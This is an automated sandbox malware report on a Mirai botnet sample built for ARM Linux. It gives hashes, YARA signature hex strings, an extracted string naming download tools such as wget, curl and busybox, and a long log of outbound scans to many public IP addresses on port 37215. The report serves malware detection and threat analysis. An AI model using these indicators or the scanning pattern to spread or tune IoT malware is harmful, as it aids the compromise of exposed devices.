Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
huhu.arm5.elf

Overview

General Information

Sample name:huhu.arm5.elf
Analysis ID:1385364
MD5:9f845a126a218536e514a059c13dc84d
SHA1:6a29a981703c3a8582c97d8146211b95c7d213ba
SHA256:e8e80d0f8d2592bc697262ecb361e0e180cbf58826c052fcd70df33b0e1f5a21
Infos:

Detection

Mirai
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Yara detected Mirai
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:39.0.0 Ruby
Analysis ID:1385364
Start date and time:2024-02-02 06:19:11 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:huhu.arm5.elf
Detection:MAL
Classification:mal76.troj.linELF@0/1025@15/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/huhu.arm5.elf
PID:5606
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5621, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 5630, Parent: 1333)
  • Default (PID: 5630, Parent: 1333, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5645, Parent: 1333)
  • Default (PID: 5645, Parent: 1333, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5650, Parent: 1)
  • systemd-user-runtime-dir (PID: 5650, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
huhu.arm5.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    huhu.arm5.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      huhu.arm5.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1b7bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b80c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b820:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b834:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b848:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b85c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b870:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b884:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b898:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b910:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b924:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b938:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b94c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5606.1.00007f7f64017000.00007f7f64036000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5606.1.00007f7f64017000.00007f7f64036000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5606.1.00007f7f64017000.00007f7f64036000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1b7bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b80c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b820:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b834:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b848:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b85c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b870:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b884:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b898:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b910:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b924:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b938:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b94c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: huhu.arm5.elf PID: 5606JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: huhu.arm5.elf PID: 5606Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x11d89:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11d9d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11db1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11dc5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11dd9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11ded:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11e01:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11e15:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11e29:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11e3d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11e51:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11e65:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11e79:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11e8d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11ea1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11eb5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11ec9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11edd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11ef1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11f05:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11f19:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: huhu.arm5.elfAvira: detected
            Source: huhu.arm5.elfString: /proc/proc/%d/cmdlinerwgetcurlbusyboxechocatnanotfpt

            Networking

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 56948 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52624 -> 37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.100.233.53:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.187.230.134:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.63.226.52:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.44.22.26:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 136.190.71.179:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.99.237.158:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.73.174.220:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.132.160.235:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.62.188.121:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.149.47.179:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.136.152.45:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.171.27.53:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.51.222.60:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 204.140.98.85:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.48.171.17:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.14.240.190:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 187.162.147.48:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.246.110.104:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 149.255.111.32:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.73.255.153:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 209.23.98.184:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.181.130.221:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 75.10.194.162:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.201.68.123:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.184.237.174:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.134.174.180:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 134.103.63.212:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.137.189.176:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.135.54.178:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.174.182.43:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.101.123.169:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 50.132.215.189:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.247.160.184:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 65.208.233.35:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.102.213.179:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 36.214.226.170:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.42.223.180:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.204.19.69:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.199.148.38:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.249.19.167:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 147.57.178.0:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.122.211.5:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.64.150.123:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.33.25.144:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.81.202.220:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.187.33.142:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.93.26.107:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.184.156.78:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.154.138.230:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.138.254.106:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.128.46.83:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.167.219.190:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 75.21.121.198:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.235.32.146:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.181.34.167:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.158.206.113:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.194.139.175:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 138.25.199.218:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.198.26.187:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 187.66.78.167:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.7.31.253:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.171.51.246:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 164.177.148.64:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 19.43.21.26:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.10.165.5:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 221.55.10.90:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 220.62.127.165:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.96.236.205:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.254.52.211:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 213.166.233.98:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 202.83.55.172:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.6.99.230:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 100.59.187.242:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.249.33.217:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.77.32.143:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.140.19.91:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.76.6.86:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.60.41.153:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.221.52.209:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.238.184.11:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 143.87.243.223:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.47.46.193:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.237.246.83:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 171.81.64.156:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.111.253.207:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.74.166.128:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.208.30.168:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 155.41.96.64:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.127.87.76:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.21.42.148:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.168.243.169:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.106.3.54:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 64.228.116.169:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.190.150.28:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 61.96.82.25:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 66.107.174.202:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.22.182.234:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.255.246.131:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.197.146.129:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 141.76.190.2:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.138.176.223:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.218.246.97:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.139.12.222:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.73.250.74:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.133.167.82:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.127.101.119:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.129.153.165:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.5.45.23:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.95.214.10:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.35.140.7:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 20.248.78.217:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.115.63.242:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 191.99.99.66:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.113.63.186:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 213.225.54.34:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.42.85.215:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.190.75.87:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 206.247.204.43:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.101.96.183:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.204.107.100:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.147.165.100:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.187.27.251:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.76.239.18:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.227.35.104:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.140.7.239:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.241.210.86:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.149.29.82:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.185.92.207:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.82.239.126:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.22.75.15:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.77.34.2:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 174.70.245.81:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 17.50.42.199:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.43.78.148:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.82.125.68:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.95.164.22:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.129.50.71:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.78.208.167:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.166.254.95:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 37.59.229.189:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 24.1.140.237:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.107.82.201:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.175.250.158:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.163.0.212:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 70.211.1.103:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.234.130.89:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.26.50.7:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.72.81.92:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 91.107.62.18:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 173.102.18.213:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.73.177.82:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.68.249.167:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 102.36.117.139:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.14.104.122:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 24.111.183.234:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.188.212.252:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.207.191.243:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 78.67.81.205:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 117.101.92.119:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 155.52.38.161:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.113.241.220:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.189.23.181:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.87.62.105:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 87.181.218.210:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.6.115.248:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.62.86.96:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 160.19.226.69:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.136.103.251:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.95.48.134:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.237.46.66:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.178.175.249:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.106.196.223:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.138.19.42:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.164.177.76:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.175.109.1:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.157.115.41:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.196.237.52:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.63.115.128:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.100.152.93:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 41.209.43.146:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.177.163.181:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 211.228.251.106:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.125.63.220:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 197.154.106.220:37215
            Source: global trafficTCP traffic: 192.168.2.15:23467 -> 157.17.204.123:37215
